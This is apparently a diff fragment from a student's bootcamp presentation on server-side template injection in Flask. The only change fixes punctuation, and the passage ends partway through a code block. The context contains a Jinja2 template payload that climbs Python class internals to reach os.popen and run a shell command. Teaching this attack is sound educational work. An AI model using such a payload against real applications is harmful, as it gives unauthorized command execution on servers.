gustavoalito/BeCode/5. Programming/01-scripting/01-Python/2.python_advanced/12.Flask/SSTI Group Presentation.md

 Python being an Object Oriented Programming language, it gives us access to some built-in methods that we could use to exploit the system, such as `__init__`

-If we execute this snippet;
+If we execute this snippet:

 ```sh
 {{ "hello".__class__.__base__.__subclasses__()[182].__init__.__globals__['sys'].modules['os'].popen("ls").read()}}